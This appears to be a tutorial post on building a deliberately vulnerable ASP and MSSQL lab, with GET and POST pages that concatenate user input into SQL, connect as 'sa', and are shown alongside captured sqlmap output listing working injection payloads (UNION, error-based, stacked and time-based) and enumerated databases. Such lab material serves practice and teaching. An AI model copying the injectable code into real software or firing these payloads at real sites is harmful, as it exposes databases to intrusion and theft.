

Notes on constructing an MSSQL injection point - Website security - Self-taught PHP

GET injection point. The vulnerable ASP page takes the id query-string parameter and concatenates it straight into the SQL statement:

```asp
<%
' Deliberately vulnerable GET endpoint: id is concatenated into the SQL string
dim prodId, query, conn, rs
prodId = Request.QueryString("id")

set conn = server.createObject("ADODB.Connection")
set rs = server.createObject("ADODB.Recordset")

' Injection point: prodId is never validated or parameterised
query = "select prodName from products where id = " & prodId

conn.Open "Provider=SQLOLEDB; Data Source=(local); Initial Catalog=数据库; User Id=sa; Password=密码"
rs.activeConnection = conn
rs.open query

if not rs.eof then
    response.write "Got product " & rs.fields("prodName").value
else
    response.write "No product found"
end if
%>
```

SQL statements: create the table in a database, then query it:

```sql
create table products
(
    id int identity(1,1) not null,
    prodName varchar(50) not null
)

insert into products(prodName) values('1')
insert into products(prodName) values('2')
insert into products(prodName) values('3')
```

Running sqlmap against the page (output as captured):

```
root@Dis9Team:/pen# sqlmap -u "http://5.5.5.134/sql.asp?id=1" --dbs

    sqlmap/1.0-dev (r4911) - automatic SQL injection and database takeover tool

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 13:10:54

[13:10:55] [INFO] using '/pen/sqlmap-dev/output/5.5.5.134/session' as session file
[13:10:55] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
[13:10:55] [INFO] testing connection to the target url
[13:10:55] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2431=2431

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1 AND 5223=CONVERT(INT,(CHAR(58)+CHAR(106)+CHAR(107)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (5223=5223) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(107)+CHAR(122)+CHAR(58)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: id=-3220 UNION SELECT CHAR(58)+CHAR(106)+CHAR(107)+CHAR(99)+CHAR(58)+CHAR(107)+CHAR(102)+CHAR(75)+CHAR(122)+CHAR(97)+CHAR(84)+CHAR(120)+CHAR(83)+CHAR(79)+CHAR(83)+CHAR(58)+CHAR(111)+CHAR(107)+CHAR(122)+CHAR(58)--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=1; WAITFOR DELAY '0:0:5';--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1 WAITFOR DELAY '0:0:5'--
---

[13:10:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS: Microsoft SQL Server 2005
[13:10:55] [INFO] fetching database names
[13:10:55] [INFO] the SQL query used returns 5 entries
[13:10:55] [INFO] retrieved: "master"
[13:10:55] [INFO] retrieved: "model"
[13:10:55] [INFO] retrieved: "msdb"
[13:10:55] [INFO] retrieved: "myDB"
[13:10:55] [INFO] retrieved: "tempdb"
available databases [5]:
[*] master
[*] model
[*] msdb
[*] myDB
[*] tempdb

[13:10:55] [INFO] Fetched data logged to text files under '/pen/sqlmap-dev/output/5.5.5.134'

[*] shutting down at 13:10:55

root@Dis9Team:/pen#
```

--------------------------------------------------- the great divider --

POST injection point.

SQL:

```sql
create table users
(
    userId int identity(1,1) not null,
    userName varchar(50) not null,
    userPass varchar(20) not null
)

insert into users(userName, userPass) values('john', 'doe')
insert into users(userName, userPass) values('admin', 'wwz04ff')
insert into users(userName, userPass) values('fsmith', 'mypassword')
```

ASP:

```asp
<%
' Deliberately vulnerable POST login: both form fields are concatenated into the SQL string
dim userName, password, query
dim conn, rs

userName = Request.Form("userName")
password = Request.Form("password")

set conn = server.createObject("ADODB.Connection")
set rs = server.createObject("ADODB.Recordset")

' Injection point: the form values are never parameterised
query = "select count(*) from users where userName='" & userName & "' and userPass='" & password & "'"

conn.Open "Provider=SQLOLEDB; Data Source=(local); Initial Catalog=myDB; User Id=sa; Password="
rs.activeConnection = conn
rs.open query

' count(*) always returns one row, so test the count itself rather than rs.eof
if rs.fields(0).value > 0 then
    response.write "Logged In"
else
    response.write "Bad Credentials"
end if
%>
```

HTML submission form:

```html
<form name="frmLogin" action="ASP.asp" method="post">
Username: <input type="text" name="userName">
Password: <input type="text" name="password">
<input type="submit">
</form>
```
